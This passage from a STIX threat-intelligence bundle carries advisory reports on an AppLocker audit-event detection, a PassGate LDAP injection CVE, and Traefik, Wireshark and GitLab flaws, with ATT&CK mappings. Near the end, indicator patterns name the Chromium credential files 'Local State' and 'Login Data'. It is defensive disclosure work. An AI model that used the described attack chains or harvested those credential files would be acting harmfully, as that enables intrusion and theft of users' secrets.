      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--20c52eee-117f-5e44-b3c2-c403a833b6e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc30d640-9a52-5dc9-a4e9-5fe7e88e7ed6",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fc30d640-9a52-5dc9-a4e9-5fe7e88e7ed6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AppLocker Audit Events Indicate Potential Policy Violations",
      "description": "## Overview\n\nThis brief focuses on the detection of Windows AppLocker audit events (Event IDs 8003, 8006, 8021, 8024), which signify that applications, DLLs, scripts, MSIs, or packaged applications would have been blocked if AppLocker policies were in 'Enforce rules' mode. These events, generated while AppLocker operates in 'Audit only' mode, provide critical intelligence to security operations centers (SOCs) and detection engineers. By monitoring these specific event IDs, organizations can proactively identify potential policy violations, unauthorized software execution attempts, or even malware activity without disrupting legitimate business processes. This allows for thorough testing and refinement of AppLocker policies before full enforcement, ensuring that only intended applications are permitted while malicious or unapproved software is flagged.\n\n## Impact\n\nWhen AppLocker is configured in 'Audit only' mode, no applications are actively blocked. However, the generation of these audit events (8003, 8006, 8021, 8024) provides invaluable insight into what *would* have been blocked under an enforced policy. The primary impact is the ability to thoroughly test and refine AppLocker policies without user disruption, which can reveal widespread usage of unsanctioned applications or previously undetected malware. Failure to monitor these audit events means losing a crucial opportunity to identify potential attack vectors, unauthorized software installations, or attempts by adversaries to execute malicious code, all of which would lead to successful execution if the policies were later enforced without prior tuning. This capability allows security teams to proactively strengthen their application control posture and prevent future breaches.\n\n## Recommendation\n\n* Deploy the Sigma rule \"AppLocker Application Would Have Been Blocked\" to your SIEM solution to identify potential policy violations in AppLocker audit mode.\n* Ensure that Windows AppLocker event logging for `Microsoft-Windows-AppLocker/EXE and DLL` and `Microsoft-Windows-AppLocker/MSI and Script` is enabled and forwarded to your central logging system.\n* Tune the deployed Sigma rule for the specific `logsource` and expected false positives within your environment, especially during AppLocker policy testing phases.\n",
      "published": "2026-07-09T14:04:27Z",
      "labels": [
        "applocker",
        "audit",
        "windows-security",
        "application-control"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker"
        },
        {
          "source_name": "reference",
          "url": "https://www.splunk.com/en_us/blog/security/deploy-test-monitor-mastering-microsoft-applocker-part-2.html"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ee844150(v=ws.11)"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/builtin/applocker/win_applocker_application_would_have_been_blocked.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de7b841b-6f6c-5be7-9205-46dfc2416461",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b07ac7f-6b60-54ca-bb1a-518ab7265cb7",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--afcde4c6-8589-50b2-ba3e-1b2affc71c78",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b07ac7f-6b60-54ca-bb1a-518ab7265cb7",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Cloud Storage",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--69d41063-c946-5c81-84b3-2ece5b83461e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b07ac7f-6b60-54ca-bb1a-518ab7265cb7",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8b07ac7f-6b60-54ca-bb1a-518ab7265cb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-4256 - PEAKUP PassGate LDAP Injection Vulnerability",
      "description": "## Overview\n\nA significant vulnerability, CVE-2026-4256, has been identified in PEAKUP Technology Inc.'s PassGate software, affecting all versions up to and including those released on April 30, 2026. This vulnerability is classified as an 'LDAP Injection' flaw (CWE-90) and stems from improper neutralization of special elements within LDAP queries. An unauthenticated attacker can exploit this weakness to inject malicious syntax into user-controlled input, which the application then processes as part of an LDAP query. Successful exploitation can lead to unauthorized information disclosure, such as sensitive user data or credentials, and potentially limited manipulation of directory entries, posing a substantial risk to the confidentiality and integrity of systems relying on PassGate for authentication and authorization. The vulnerability carries a CVSS v3.1 base score of 8.2, indicating its high severity.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a public-facing instance of PEAKUP PassGate.\n2. The attacker crafts a malicious HTTP request containing specially designed input for a vulnerable application field.\n3. This input includes LDAP query metacharacters (e.g., `*`, `(`, `)`, `=`, `\u0026`, `|`) intended to alter the original LDAP query logic.\n4. The PassGate application, due to improper input sanitization, fails to neutralize these special elements.\n5. The malicious input is directly concatenated into an LDAP query that the PassGate application sends to its underlying LDAP server.\n6. The LDAP server executes the modified query, which was not intended by the application developer.\n7. This execution could result in the retrieval of unauthorized directory information (e.g., user attributes, group memberships, credentials).\n8. The attacker gains access to sensitive data or modifies directory entries based on the results of the injected LDAP query.\n\n## Impact\n\nThe primary impact of CVE-2026-4256 is a high confidentiality breach, where an attacker can gain unauthorized access to sensitive information stored in the LDAP directory. This could include user credentials, personally identifiable information, or other critical business data, compromising system security and potentially leading to further network intrusions. While the integrity impact is rated as low, successful exploitation could still allow for limited modification of directory entries, which might disrupt services or facilitate privilege escalation. There is no specified impact on system availability, and the number of victims or targeted sectors has not been publicly disclosed, but any organization using affected PassGate versions is at risk.\n\n## Recommendation\n\n* Immediately apply the security update provided by PEAKUP Technology Inc. that addresses **CVE-2026-4256** to all affected PassGate installations.\n* Configure Web Application Firewalls (WAFs) to include rules specifically designed to detect and block common LDAP injection patterns, protecting endpoints exposed by the **PassGate** application.\n* Implement robust logging for **PassGate** and LDAP server interactions, and monitor these logs for unusual LDAP query structures, frequent authentication failures from single sources, or unexpected data retrieval volumes.\n* Conduct regular security audits and penetration testing on **PassGate** deployments to identify and mitigate similar vulnerabilities.\n",
      "published": "2026-07-09T14:17:42Z",
      "labels": [
        "ldap-injection",
        "vulnerability",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4256"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0523"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3faf76a7-9f22-5e0e-9c2c-05bde9d0354a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/traefik/traefik/security/advisories/GHSA-42cj-m3vj-89wv",
      "pattern": "[url:value = 'https://github.com/traefik/traefik/security/advisories/GHSA-42cj-m3vj-89wv']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T14:26:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27b0c2be-7365-51db-b133-fb91abe90484",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d40d9190-f2de-55c1-88c9-f22419898a24",
      "target_ref": "indicator--3faf76a7-9f22-5e0e-9c2c-05bde9d0354a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a292ee2c-a1e7-5b28-8318-008b22833a3f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/traefik/traefik/security/advisories/GHSA-cxjq-mrr5-89rv",
      "pattern": "[url:value = 'https://github.com/traefik/traefik/security/advisories/GHSA-cxjq-mrr5-89rv']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T14:26:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8d71caae-52b6-5d16-b838-d7a148854ac7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d40d9190-f2de-55c1-88c9-f22419898a24",
      "target_ref": "indicator--a292ee2c-a1e7-5b28-8318-008b22833a3f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--89a1b5b0-878a-59b3-b314-10e2441aa6c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/traefik/traefik/security/advisories/GHSA-qq9q-x9w4-chhj",
      "pattern": "[url:value = 'https://github.com/traefik/traefik/security/advisories/GHSA-qq9q-x9w4-chhj']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T14:26:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8c873c5-7d3f-5cd8-a983-9ade82b9f7e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d40d9190-f2de-55c1-88c9-f22419898a24",
      "target_ref": "indicator--89a1b5b0-878a-59b3-b314-10e2441aa6c2"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d40d9190-f2de-55c1-88c9-f22419898a24",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Security Policy Bypass Vulnerabilities in Traefik Edge Router",
      "description": "## Overview\n\nThe French national cybersecurity agency, ANSSI CERT-FR, issued an advisory on July 9, 2026, detailing multiple security vulnerabilities in Traefik, an open-source Edge Router. These flaws impact Traefik versions 3.6.x prior to 3.6.23, versions 3.7.x prior to 3.7.7, and all versions prior to 2.11.52. The vulnerabilities allow an attacker to bypass security policies implemented by Traefik, potentially leading to unauthorized access, exposure of sensitive internal services, or manipulation of traffic. Defenders should prioritize patching these versions to prevent exploitation and maintain the integrity of their network edge. These vulnerabilities could expose an organization's internal infrastructure if not addressed promptly.\n\n## Impact\n\nThe identified vulnerabilities enable attackers to circumvent Traefik's security policy. This could result in unauthorized access to internal services that should otherwise be protected, potentially exposing sensitive applications or data. Successful exploitation could lead to data breaches, unauthorized system modifications, or further network penetration by hostile actors. While specific victim counts or targeted sectors were not detailed, any organization utilizing affected Traefik versions is at risk of exposure if patches are not applied.\n\n## Recommendation\n\n- Apply the latest security patches provided by the vendor to all affected Traefik versions immediately.\n- Consult the Traefik security advisories for detailed patching instructions at `https://github.com/traefik/traefik/security/advisories/GHSA-42cj-m3vj-89wv`, `https://github.com/traefik/traefik/security/advisories/GHSA-cxjq-mrr5-89rv`, and `https://github.com/traefik/traefik/security/advisories/GHSA-qq9q-x9w4-chhj`.\n",
      "published": "2026-07-09T14:26:19Z",
      "labels": [
        "vulnerability",
        "policy-bypass",
        "Traefik",
        "edge-router"
      ],
      "object_refs": [
        "indicator--3faf76a7-9f22-5e0e-9c2c-05bde9d0354a",
        "indicator--a292ee2c-a1e7-5b28-8318-008b22833a3f",
        "indicator--89a1b5b0-878a-59b3-b314-10e2441aa6c2"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0851/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-42cj-m3vj-89wv"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-cxjq-mrr5-89rv"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-qq9q-x9w4-chhj"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--43bcf053-87b0-5515-8030-a0ed6294f71a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--83360615-95bb-5129-bd85-807a11f189b3",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1ff069da-5198-5108-9957-f2cb00d02f5e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--83360615-95bb-5129-bd85-807a11f189b3",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--83360615-95bb-5129-bd85-807a11f189b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities Discovered in Wireshark Leading to DoS and Data Confidentiality Compromise",
      "description": "## Overview\n\nMultiple critical vulnerabilities, identified as CVE-2026-15163 through CVE-2026-15174, have been disclosed in Wireshark, a widely-used network protocol analyzer. These flaws affect Wireshark versions 4.6.x prior to 4.6.7 and all versions prior to 4.4.17. Published by CERT-FR on July 9, 2026, these vulnerabilities could enable a remote attacker to trigger a denial of service condition in the application, leading to instability or crashes. Furthermore, certain vulnerabilities could also facilitate an unauthorized compromise of data confidentiality, potentially exposing sensitive information being processed or analyzed by Wireshark. Organizations using vulnerable versions are strongly advised to patch immediately to mitigate the risk of disruption and data exposure posed by these publicly identified security issues.\n\n## Attack Chain\n\n1. **Attacker crafts malicious network traffic or capture file**: An attacker develops specifically malformed network packets or a corrupted capture file (e.g., PCAP, PCAPNG) targeting known vulnerabilities in Wireshark's dissection logic.\n2. **Delivery of malicious input (network)**: The attacker transmits the crafted network traffic over a network segment monitored by a vulnerable Wireshark instance, relying on Wireshark to capture and process it.\n3. **Delivery of malicious input (file)**: Alternatively, the attacker delivers the malicious capture file (e.g., via email, web download, or removable media) to a user of a vulnerable Wireshark installation.\n4. **Wireshark processes malicious data**: The vulnerable Wireshark instance begins to dissect the malicious network traffic it captured or the user manually opens the malicious capture file.\n5. **Vulnerability triggered in protocol dissector**: During the parsing of the malformed data, a flaw within one of Wireshark's protocol dissectors (e.g., memory corruption, infinite loop, buffer overflow) is triggered.\n6. **Application crash (Denial of Service)**: The triggered vulnerability causes the Wireshark application to crash unexpectedly, resulting in a denial of service for the user.\n7. **Potential information disclosure**: Depending on the specific vulnerability, an attacker might be able to read or leak sensitive data from the Wireshark process's memory space, leading to a confidentiality breach.\n\n## Impact\n\nThe successful exploitation of these Wireshark vulnerabilities can lead to significant operational disruption for network analysts and security professionals. Remote attackers can cause the Wireshark application to crash, rendering it unusable and impacting ongoing network analysis tasks. Additionally, the data confidentiality breach aspect means that an attacker could potentially gain unauthorized access to sensitive network traffic data or other information residing in the memory of the Wireshark process. While no specific victim counts or targeted sectors are mentioned, any organization using vulnerable Wireshark versions for network monitoring, troubleshooting, or security analysis is at risk of operational downtime and sensitive data exposure.\n\n## Recommendation\n\n* Immediately patch CVE-2026-15163, CVE-2026-15164, CVE-2026-15165, CVE-2026-15166, CVE-2026-15167, CVE-2026-15168, CVE-2026-15169, CVE-2026-15170, CVE-2026-15171, CVE-2026-15172, CVE-2026-15173, and CVE-2026-15174 by updating all Wireshark installations to version 4.6.7 or later, or 4.4.17 or later, as specified in the affected products section.\n",
      "published": "2026-07-09T14:27:33Z",
      "labels": [
        "vulnerability",
        "wireshark",
        "dos",
        "info-disclosure",
        "product-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0849/"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-52.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-53.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-54.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-55.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-56.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-57.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-58.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-59.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-60.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-61.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-62.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.wireshark.org/security/wnpa-sec-2026-63.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15163"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15164"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15165"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15166"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15167"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15168"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15169"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15170"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15171"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15172"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15173"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15174"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--672fd535-3eca-5482-a172-3335eb5d1b9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--af63f852-7237-5b74-94db-1654888bcd3f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--af63f852-7237-5b74-94db-1654888bcd3f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities Discovered in GitLab CE/EE",
      "description": "## Overview\n\nMultiple critical and high-severity vulnerabilities, including CVE-2025-12506, CVE-2026-11827, CVE-2026-13151, CVE-2026-13320, CVE-2026-6352, CVE-2026-6896, CVE-2026-7492, and CVE-2026-8472, have been identified in GitLab Community Edition (CE) and Enterprise Edition (EE). These flaws impact versions 19.0.x prior to 19.0.4, 19.1.x prior to 19.1.2, and all versions prior to 18.11.7. These vulnerabilities could enable an attacker to achieve data confidentiality compromise, perform indirect remote code injection through Cross-Site Scripting (XSS), and bypass existing security policies. The CERT-FR issued an advisory on July 9, 2026, based on a GitLab security bulletin from July 8, 2026, urging users to apply patches immediately. The discovery highlights the ongoing need for vigilant patch management in web-based version control systems.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could lead to significant unauthorized access and control over GitLab instances. An attacker could exfiltrate sensitive data, manipulate user interfaces or execute arbitrary code in a victim's browser through XSS, potentially leading to session hijacking or further compromise. Furthermore, security policy bypasses could undermine an organization's defensive measures, granting attackers persistent access or enabling broader network penetration. The nature of these vulnerabilities, particularly in a critical development platform like GitLab, poses a substantial risk to intellectual property, code integrity, and operational continuity for affected organizations.\n\n## Recommendation\n\n* Immediately apply the security patches provided by GitLab for all affected versions of GitLab Community Edition (CE) and Enterprise Edition (EE) as referenced in the GitLab security bulletin (https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-1-2-released/).\n* Specifically, update GitLab CE/EE to version 19.0.4 or later if currently on 19.0.x, to 19.1.2 or later if on 19.1.x, and to 18.11.7 or later if on versions prior to 18.11.7.\n* Review web application firewall (WAF) configurations to potentially detect and block unusual requests targeting common XSS vectors, specifically for CVE-2026-11827.\n",
      "published": "2026-07-09T14:28:54Z",
      "labels": [
        "web-application",
        "vulnerability",
        "gitlab",
        "xss",
        "data-leak"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0850/"
        },
        {
          "source_name": "reference",
          "url": "https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-1-2-released/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-12506"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11827"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13151"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13320"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6352"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6896"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7492"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8472"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0a2eb9fe-594f-5c0b-b04f-7afca4f0765a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations",
      "pattern": "[url:value = 'https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d2af5ac6-4edc-56d0-8978-9771e6816e44",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--0a2eb9fe-594f-5c0b-b04f-7afca4f0765a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a67f9191-8188-58fb-bf2e-0e31c5f26d3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://peter.sh/experiments/chromium-command-line-switches/",
      "pattern": "[url:value = 'https://peter.sh/experiments/chromium-command-line-switches/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2f25e5f-8bfa-5a22-9221-64be2966a509",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--a67f9191-8188-58fb-bf2e-0e31c5f26d3b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d22a4104-2479-5b13-bf8d-c9d0e8f63cdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1185/browser_unusual_flag/castle_chrome_shell32.log",
      "pattern": "[url:value = 'https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1185/browser_unusual_flag/castle_chrome_shell32.log']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c83a9c17-b167-5f3e-9ab5-575d34b963fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--d22a4104-2479-5b13-bf8d-c9d0e8f63cdf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5925146-4959-59d3-a680-467c0fc1c38f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_name: Local State",
      "pattern": "[x-ti-bot:file_name = 'Local State']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3c2df410-96ee-5c1f-9412-221177b0c79b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--e5925146-4959-59d3-a680-467c0fc1c38f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--809a1210-48b1-5c94-ba8d-b012de0382ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_name: Login Data",
      "pattern": "[x-ti-bot:file_name = 'Login Data']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cbc923ab-86fb-562c-9a2c-318a4f33f297",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--809a1210-48b1-5c94-ba8d-b012de0382ef"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5570e157-3c6e-56f7-928d-f502afc1eb20",
